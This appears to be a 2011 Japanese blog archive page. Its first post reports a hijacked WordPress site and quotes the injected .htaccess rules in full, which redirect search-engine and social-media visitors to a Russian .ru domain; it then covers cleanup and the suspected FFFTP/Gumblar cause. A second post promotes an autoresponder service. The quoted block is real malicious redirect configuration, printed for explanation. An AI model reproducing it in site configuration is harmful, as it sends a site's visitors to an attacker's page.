Archive for 9月, 2011

　
当事者には大変失礼ながら、非常に興味津々な状況に立ち会えたので、経緯と解決策をご報告します。
　
・状況
ワードプレスを使ってECサイトを運営している友人より相談あり、自サイトにアクセスしたら、おそロシアへ連れ去られる。
管理画面にログインは出来るが、ダッシュボード上、あらゆるリンクの遷移先が「***.ru」サイトへ向いている。
FTPもログイン出来る。
「***.ru」は検索してもノーヒット。
　
　
・確認内容と作業内容
サーバ内ファイルを日付でソートしたところ、WPディレクトリトップに置かれている「htaccess」が昨日の日付で更新されている。
ファイルを開いたところ、下段に大きく改行かつ、右に大きく改行（頭にスペース）して訳が分からぬ記述あり。
こんな感じです。

ErrorDocument 400 http://jobtectil.ru/systematic/index.php
ErrorDocument 401 http://jobtectil.ru/systematic/index.php
ErrorDocument 403 http://jobtectil.ru/systematic/index.php
ErrorDocument 404 http://jobtectil.ru/systematic/index.php
ErrorDocument 500 http://jobtectil.ru/systematic/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://jobtectil.ru/systematic/index.php [R=301,L]

これらの記述を消して「htaccess」を上書きしましたが、瞬時で書き換えられます。
（削除を選択すると権限なしと弾かれる）
怪しいファイル／フォルダはないかと探したところ、「upgrade」という妙なフォルダを発見。例によってアクセス日付が昨日でした。
中身は目視する限り空でしたが、このフォルダを削除し再度「htaccess」をアップロードしたところ、大成功。
おまじないとして、WPのパスワードとFTPのパスワードを変更。

　
・原因に関する推察
サイトのオーナーの環境は「Microsoft Security Essentials」プラス「FFFTP」を使っています。
ここから完全推察ですが、どこかの怪しいサイトを踏んで「Microsoft Security Essentials」がスルーし、「FFFTP」の脆弱性突かれてトラップ仕込まれたんじゃないでしょうか？
色々検索していたらこういう海外ブログを発見。
Htaccess Redirect to Example.ru/dir/index.php | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2010/10/14/htaccess-redirect-to-example-rudirindex-php-2/
　
状況全く一緒です。この海外ブログの方も「恐らく原因はFTP」と書かれています。
知っている人は知っている通り、GENOウィルス＝Gumblarの代名詞的存在となった「FFFTP」は今年（2011年）の8月に作者さんが開発投了されていまして、いわば地雷原をスキップするような状態です。
http://www2.biglobe.ne.jp/~sota/
何を今更かもしれませんが、気になる方は「Gumblar対策」などで検索して下さい。
　
　
・最後に
今回の処理で原因の根本が除去されたのかどうか、当方では分かりません。
FFFTPを窓から投げ捨て、レジストリを掃除し（GumblarはFTPのレジストリ情報を読みに行くそうです）
窓の杜 – 【NEWS】“Gumblar”問題を受け、「FFFTP」のレジストリ設定を削除するツールが公開
http://www.forest.impress.co.jp/docs/news/20100201_346309.html
複数のウィルススキャン、それとマルウェア対策ソフトでスクリーニングする必要があるでしょう。
実行ファイルを仕込まれているのならそれを除去しない限り、同じ事の繰り返しです。

提案型営業や説明型商品、説得型商品（サービス）の強烈な営業支援ツールである「ステップメール」のセットアップ（内製化）に成功しました。
ダブルオプトイン方式・マルチシナリオ・メルマガ連動と、完ぺきな内容での仕上がり。
当社より納品した全てのお客様のホームページへ後付け組み込み可能です。

＃　日本語マニュアルが流通していないため、国内でのレビューは目にしたことありません。
＃　操作マニュアルらしきものは手元で完成。ネットで公開するかどうかは未定。
＃　英語ではステップメールでなくautoresponderと呼ぶとは知らなんだ
＃　サラリーマン時代は電話営業会社をターゲットに「クレーム電話を利益に・・」とか、やったことありますよ。高レスポンスでした。

「ステップメール」そのものは多数流通していますが、自社でハンドリングしている国内の中小企業はほぼ０社と思われ（というか導入している中小企業自体が極少ですが）、自動販売機と同じで完全放置プレーで驚異的な導入効果はあるものの、業者へのASP代＝ランニングコストが年間で下限6万円～平均30万円前後掛かりますので、自社運営すれば大幅な経費削減にもなりますね。

ワードプレスであれば外付け可能ですので、興味がある方はどうぞご連絡下さい。